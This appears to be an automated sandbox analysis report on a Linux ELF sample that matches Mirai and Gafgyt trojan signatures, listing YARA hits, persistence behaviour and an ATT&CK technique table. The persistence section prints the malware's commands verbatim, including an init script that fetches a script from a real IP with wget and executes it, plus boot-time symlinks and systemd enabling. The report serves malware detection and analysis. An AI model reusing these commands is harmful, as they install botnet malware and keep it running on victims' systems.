          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: classification engineClassification label: mal96.spre.troj.evad.linELF@0/9@0/0

          Persistence and Installation Behavior

          barindex
          Source: /tmp/x86_32.nn.elf (PID: 6238)File: /etc/profileJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6238)File: /etc/rc.localJump to behavior
          Source: /usr/bin/ln (PID: 6289)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
          Source: /usr/bin/ln (PID: 6296)File: /etc/rc.d/S99sh -> /etc/init.d/shJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6238)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6287)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6292)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6450/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6472/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6471/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6474/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6396/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6473/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6476/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6475/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6470/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/799/cmdlineJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6447/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6469/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6446/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6468/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6449/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6448/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6461/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6460/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6463/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6462/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6465/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6068/cmdlineJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6464/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6368/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6445/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6467/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6444/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6466/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6416/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6300)File opened: /proc/6418/statusJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6253)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6286)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6288)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6290)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6291)Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6293)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6295)Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"Jump to behavior
          Source: /bin/sh (PID: 6287)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
          Source: /bin/sh (PID: 6292)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/shJump to behavior
          Source: /bin/sh (PID: 6294)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
          Source: /bin/sh (PID: 6260)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6238)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6287)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6292)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /tmp/x86_32.nn.elf (PID: 6238)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
          Source: /tmp/x86_32.nn.elf (PID: 6238)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
          Source: /bin/sh (PID: 6290)Writes shell script file to disk with an unusual file extension: /etc/init.d/shJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: /tmp/x86_32.nn.elf (PID: 6238)File: /etc/init.d/systemJump to dropped file
          Source: /bin/sh (PID: 6290)File: /etc/init.d/shJump to dropped file
          Source: /tmp/x86_32.nn.elf (PID: 6238)File: /tmp/x86_32.nn.elfJump to behavior
          Source: x86_32.nn.elf, 6238.1.00000000ffa50000.00000000ffa71000.rw-.sdmp, x86_32.nn.elf, 6297.1.00000000ffa50000.00000000ffa71000.rw-.sdmp, x86_32.nn.elf, 6308.1.00000000ffa50000.00000000ffa71000.rw-.sdmp, x86_32.nn.elf, 6311.1.00000000ffa50000.00000000ffa71000.rw-.sdmpBinary or memory string: qemu-

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6238, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6297, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6308, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6311, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6238, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6297, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6308, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 6311, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information2
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Unix Shell Configuration Modification
          1
          Unix Shell Configuration Modification
          1
          Masquerading
          1
          OS Credential Dumping
          1
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          Data Manipulation
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Systemd Service
          1
          Systemd Service
          2
          File and Directory Permissions Modification
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt2
          Scripting
          Logon Script (Windows)1
          File Deletion
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
